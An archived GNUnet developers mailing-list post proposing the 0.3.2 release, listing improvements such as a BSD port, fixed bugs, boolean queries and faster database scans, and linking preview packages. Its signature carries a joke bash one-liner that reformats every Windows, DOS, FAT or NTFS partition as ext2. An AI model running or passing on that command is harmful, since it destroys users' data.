[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[GNUnet-developers] GNUnet 0.3.2...
From: |
Christian Grothoff |
Subject: |
[GNUnet-developers] GNUnet 0.3.2... |
Date: |
Sun, 17 Mar 2002 10:59:24 -0500 |
Hi all!
I've pretty much given up on having a gtk gui for 0.3.2 (its still far from
being finished, probably won't happen this month). But I think we should
release 0.3.2, there have been so many improvements:
* BSD port(s)
* fatal bugs fixed (0.3.1 gnunet-download: non-initalized stuff)
* better key exchange heuristics (today, no longer key-exchange mania)
* download can continue aborted downloads without re-issuing requests
for completed blocks)
* optimized routing of queries
* implemented boolean queries
* timeout for gnunet-search
* much faster scan of database for content to discard
Did I miss anything? (I need this list for freshmeat.net). I've made
preview-packages for you so that you can find last-minute bugs (like BSD
compile errors :-):
http://gecko.cs.purdue.edu/GNUnet/GNUnet-0.3.2.tar.gz
(also there: rpm, tar.bz2, same names as for 0.3.1).
The current CVS should have the same sources. Please reply asap if you have
anything that we should do before the release!
Christian
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- [GNUnet-developers] GNUnet 0.3.2...,
Christian Grothoff <=